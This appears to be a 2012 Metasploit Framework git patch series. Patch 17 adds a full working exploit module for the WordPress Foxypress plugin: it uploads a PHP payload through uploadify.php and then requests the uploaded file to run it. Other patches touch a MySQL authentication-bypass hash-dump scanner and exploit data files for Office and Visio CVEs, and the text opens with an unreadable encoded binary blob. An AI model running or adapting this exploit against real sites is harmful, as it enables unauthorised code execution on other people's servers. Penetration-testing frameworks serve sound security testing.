z3%|tS5=Uq_(uJdNG&g^`hGWaE6BEI#e=1m3WTCfW&io=kp}a)bV^Omi!lJI7^3xbZ9tR zhguA3I7f$zu!2P;3ys|rTZRBO19&-tjt8iu7-VjUmj zMGRlPh7CGgg<%aB>9CqNTdczxCc|o6qTx~vmr1->!%K9y9xv75I=qbIm$Qfvr*H*} z%OysxV4$v)xRN`$O5!Tkt0i8|dX2B>vY(J*E3)@u>VFDH%YviE4xLa#d@v8 zTUp=62XwoJcj)jCSF{`(X@u)suc-kLX{nN+0Qk< zjqe~h%91-_f7%-lX!x$e_wap%ZFo@O2lydE+P_=)2tQW%372E*boR8#2tXyz3y13( z{0cwC&#bMo$Qta*a<}2<3ctWFHT+89*LcX9?aChZ6?drTB~YphhUY2#1`liat-|l{ zh{Esjh=xBX{1Jar_%j?-@Fq}8@4$ZRao50H{6*ofuwUVC_&b6-0Y`PPW^O_0ocW;& z!uKftq2Zqj|HA)RnR@?m_%|Ly$oyYm(b9@gUAU^YM&WUW-!XY=>9pyD;vo8A^UTt+ z>6!o~PzWV#!fvh7`{g^3kE*z=G;iq8!Nc+fDB%E7~!UY6}5-y=z2lZUr z0jfDACCizjgu)|MZpt8Un@C0QB#PnivQYivP<>f##ez_nbEPSfF5F6F2*WB;V^iBi zrV^d-m=Ye`VXaktGroW?5wJjs&Z3JFCkfMfRb|`SaF2CZjc|4qSqR;%ja|A~lTwSb z+e9{J%~7Ho=jbk^5qEhX3f|-CPA8^I7lk{_y-%I~mO4JtCi)PnqOXG2`Ow}1=14)qJO$stVS>0| zPF0P9L(BkserRb(!ME_868)G<=?PR8g{!Iy%EG~l1qzP9_ez|K`;_p)UL|}Sh51V4 ziaZ37pRWlr3b?cWqPG$Q#O#4|3B_qj3=)HRRH(!dF;oeM7^Z|@3|C?VM~@Vvcw#hy 
zR@;zY6I>Y5#OX?m5o47YC&nvymFrGpa^^RL>VoybaBaPU*I;k6nZ5!s(+avXn{Rh7 zb48ZZ2O1y+y7C$tb>*mpCIAwe*qhLV1!)QNs?c?Lo5pMrtvgsmm<|@5M+b}G?_d$& zYz}oFQ7jqGDv4yUv@o!BduLo*UX5+ zkbtSTz)-*PnaUU#gJGtMfxi`oYdc{?z-EkWg;8YzyD_>f;4ob==vEeR=EfkcEC#3h zQ_a*EjEO;K)?-O`f^n@-WbMfA+jp?7(Cu-%_07=RO!K5u>g+~vMxjf)HK7xn!LfQy zw@C3isAz(Tdm!DI)CwtqW|$ZSCwYv?_MK1?urh$z^3L(=mGda2%FXmWY{RDxa}}5j4|U;PUMtL_aZ8%z`q~SyXn11cV z;d0RVQ^v%#-t6v)T){OYH;+N5Da_hjCapcg4LhXYk!Lz$aAly-DK>)Jw3`l_#~Fi_ z(c_0qJFz)=7dW|-Qho-Xg8}rMChrBFO7|j#zGR*_Tov%Oz$(8Z4y&o^tNog(#bHe# z(gN4S;MzD`N2pv+zm);wh876fcEXJ0h7lucwR91RL0YSJJ;B;orb?GF_CAZj$Ms)wz6S>v(e0K~sZwHJJIszT^&&mHE5q;3xpPq9GOF^?!aB>se(+D~3Ej7Uw>c_Y@*%V!= z`zHJL{ChUqadtOII_YlPDE9tslo5yu5&CYlZ{(wG_>Jq{z5!E`ZgL|?-NVWJ}T!fSd~C^MUH)Tp*_cI^H9DWC4}})z8#5|fe>`lvR3QTQzk}Q%U5c& z_d85kV^S2(qR?Gb=V&i2d@5@b6ne9$%BKtM-Yk#ZK07h=*d1FSos+X;M-=Sd5-+9Q zMQU~2j>OANJhgkvk}XO8Tb#(iN7DzaqF#MwocOf<^v@S@OoEgEgN Date: Mon, 11 Jun 2012 22:47:30 -0500 Subject: [PATCH 16/18] add osvdb ref --- modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb index 581b77d9e3..bad9a4b837 100644 --- a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb @@ -32,7 +32,8 @@ class Metasploit3 < Msf::Auxiliary 'jcran' # Authentication bypass bruteforce implementation ], 'References' => [ - ['CVE', '2012-2122'] + ['CVE', '2012-2122'], + ['OSVDB', '82804'] ], 'DisclosureDate' => 'Jun 09 2012', 'License' => MSF_LICENSE From 4ae786590adaac95e0b8a3c37646724fde0e7b6d Mon Sep 17 00:00:00 2001 
From: jvazquez-r7 Date: Tue, 12 Jun 2012 17:39:05 +0200 Subject: [PATCH 17/18] php_wordpress_foxypress from patrick updated. Related to Pull Request #475 --- .../unix/webapp/php_wordpress_foxypress.rb | 109 ++++++++++++++++++ 1 file changed, 109 insertions(+) create mode 100644 modules/exploits/unix/webapp/php_wordpress_foxypress.rb diff --git a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb new file mode 100644 index 0000000000..e14d898a7f --- /dev/null +++ b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb 
@@ -0,0 +1,109 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'WordPress plugin Foxypress uploadify.php Arbitrary Code Execution', + 'Description' => %q{ + This module exploits an arbitrary PHP code execution flaw in the WordPress + blogging software plugin known as Foxypress. The vulnerability allows for arbitrary + file upload and remote code execution via the uploadify.php script. The Foxypress + plug-in versions 0.4.2.1 and below are vulnerable. + }, + 'Author' => + [ + 'Sammy FORGIT', # Vulnerability Discovery, PoC + 'patrick' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + ['EDB', '18991'], + ['OSVDB', '82652'], + ['BID', '53805'], + ], + 'Privileged' => false, + 'Payload' => + { + 'Compat' => + { + 'ConnectionType' => 'find', + }, + }, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Jun 05 2012', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, "The full URI path to WordPress", "/"]), + ], self.class) + end + + def check + uri = target_uri.path + uri << '/' if uri[-1,1] != '/' + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{uri}wp-content/plugins/foxypress/uploadify/uploadify.php" + }) + + if res and res.code == 200 + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end + end + + def exploit + + uri = target_uri.path + uri << '/' if uri[-1,1] != '/' + + peer = "#{rhost}:#{rport}" + + post_data = Rex::MIME::Message.new + post_data.add_part("", 
"application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"") + + print_status("#{peer} - Sending PHP payload") + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{uri}wp-content/plugins/foxypress/uploadify/uploadify.php", + 'ctype' => 'multipart/form-data; boundary=' + post_data.bound, + 'data' => post_data.to_s + }) + + if not res or res.code != 200 or res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/ + print_error("#{peer} - File wasn't uploaded, aborting!") + return + end + + print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{uri}wp-content/affiliate_images/#{$1}.php" + }) + + if res and res.code != 200 + print_error("#{peer} - Server returned #{res.code.to_s}") + end + + end + +end From 21ea5396489d57f883d974bd6c0a20e1fa93bd64 Mon Sep 17 00:00:00 2001 
From: HD Moore Date: Tue, 12 Jun 2012 00:05:51 -0500 Subject: [PATCH 18/18] Permissions --- data/exploits/CVE-2011-3400/CVE-2011-3400.vsd | Bin data/exploits/CVE-2012-0013/[Content_Types].xml | 0 data/exploits/CVE-2012-0013/_rels/__rels | 0 data/exploits/CVE-2012-0013/docProps/app.xml | 0 data/exploits/CVE-2012-0013/docProps/core.xml | 0 .../CVE-2012-0013/word/_rels/document.xml.rels | 0 .../CVE-2012-0013/word/_rels/vbaProject.bin.rels | 0 data/exploits/CVE-2012-0013/word/document.xml | 0 .../CVE-2012-0013/word/embeddings/oleObject1.bin | Bin data/exploits/CVE-2012-0013/word/fontTable.xml | 0 data/exploits/CVE-2012-0013/word/media/image1.emf | Bin data/exploits/CVE-2012-0013/word/settings.xml | 0 data/exploits/CVE-2012-0013/word/styles.xml | 0 .../CVE-2012-0013/word/stylesWithEffects.xml | 0 data/exploits/CVE-2012-0013/word/theme/theme1.xml | 0 data/exploits/CVE-2012-0013/word/vbaData.xml | 0 data/exploits/CVE-2012-0013/word/vbaProject.bin | Bin data/exploits/CVE-2012-0013/word/webSettings.xml | 0 .../scanner/mysql/mysql_authbypass_hashdump.rb | 3 +++ 19 files changed, 3 insertions(+) mode change 100644 => 100755 data/exploits/CVE-2011-3400/CVE-2011-3400.vsd mode change 100644 => 100755 data/exploits/CVE-2012-0013/[Content_Types].xml mode change 100644 => 100755 data/exploits/CVE-2012-0013/_rels/__rels mode change 100644 => 100755 data/exploits/CVE-2012-0013/docProps/app.xml mode change 100644 => 100755 data/exploits/CVE-2012-0013/docProps/core.xml mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/_rels/document.xml.rels mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/_rels/vbaProject.bin.rels mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/document.xml mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/embeddings/oleObject1.bin mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/fontTable.xml mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/media/image1.emf mode change 100644 => 100755 
data/exploits/CVE-2012-0013/word/settings.xml mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/styles.xml mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/stylesWithEffects.xml mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/theme/theme1.xml mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/vbaData.xml mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/vbaProject.bin mode change 100644 => 100755 data/exploits/CVE-2012-0013/word/webSettings.xml diff --git a/data/exploits/CVE-2011-3400/CVE-2011-3400.vsd b/data/exploits/CVE-2011-3400/CVE-2011-3400.vsd old mode 100644 new mode 100755 diff --git a/data/exploits/CVE-2012-0013/[Content_Types].xml b/data/exploits/CVE-2012-0013/[Content_Types].xml old mode 100644 new mode 100755 diff --git a/data/exploits/CVE-2012-0013/_rels/__rels b/data/exploits/CVE-2012-0013/_rels/__rels old mode 100644 new mode 100755 diff --git a/data/exploits/CVE-2012-0013/docProps/app.xml b/data/exploits/CVE-2012-0013/docProps/app.xml old mode 100644 new mode 100755 diff --git a/data/exploits/CVE-2012-0013/docProps/core.xml b/data/exploits/CVE-2012-0013/docProps/core.xml old mode 100644 new mode 100755 diff --git a/data/exploits/CVE-2012-0013/word/_rels/document.xml.rels b/data/exploits/CVE-2012-0013/word/_rels/document.xml.rels old mode 100644 new mode 100755 diff --git a/data/exploits/CVE-2012-0013/word/_rels/vbaProject.bin.rels b/data/exploits/CVE-2012-0013/word/_rels/vbaProject.bin.rels old mode 100644 new mode 100755 diff --git a/data/exploits/CVE-2012-0013/word/document.xml b/data/exploits/CVE-2012-0013/word/document.xml old mode 100644 new mode 100755 diff --git a/data/exploits/CVE-2012-0013/word/embeddings/oleObject1.bin b/data/exploits/CVE-2012-0013/word/embeddings/oleObject1.bin old mode 100644 new mode 100755 diff --git a/data/exploits/CVE-2012-0013/word/fontTable.xml b/data/exploits/CVE-2012-0013/word/fontTable.xml old mode 100644 new mode 100755 
diff --git a/data/exploits/CVE-2012-0013/word/media/image1.emf b/data/exploits/CVE-2012-0013/word/media/image1.emf old mode 100644 new mode 100755 diff --git a/data/exploits/CVE-2012-0013/word/settings.xml b/data/exploits/CVE-2012-0013/word/settings.xml old mode 100644 new mode 100755 diff --git a/data/exploits/CVE-2012-0013/word/styles.xml b/data/exploits/CVE-2012-0013/word/styles.xml old mode 100644 new mode 100755 diff --git a/data/exploits/CVE-2012-0013/word/stylesWithEffects.xml b/data/exploits/CVE-2012-0013/word/stylesWithEffects.xml old mode 100644 new mode 100755 diff --git a/data/exploits/CVE-2012-0013/word/theme/theme1.xml b/data/exploits/CVE-2012-0013/word/theme/theme1.xml old mode 100644 new mode 100755 diff --git a/data/exploits/CVE-2012-0013/word/vbaData.xml b/data/exploits/CVE-2012-0013/word/vbaData.xml old mode 100644 new mode 100755 diff --git a/data/exploits/CVE-2012-0013/word/vbaProject.bin b/data/exploits/CVE-2012-0013/word/vbaProject.bin old mode 100644 new mode 100755 diff --git a/data/exploits/CVE-2012-0013/word/webSettings.xml b/data/exploits/CVE-2012-0013/word/webSettings.xml old mode 100644 new mode 100755 diff --git a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb index bad9a4b837..92abc35387 100644 --- a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb @@ -40,6 +40,9 @@ class Metasploit3 < Msf::Auxiliary ) deregister_options('PASSWORD') + register_options( [ + OptString.new('USERNAME', [ true, 'The username to authenticate as', "root" ]) + ], self.class ) end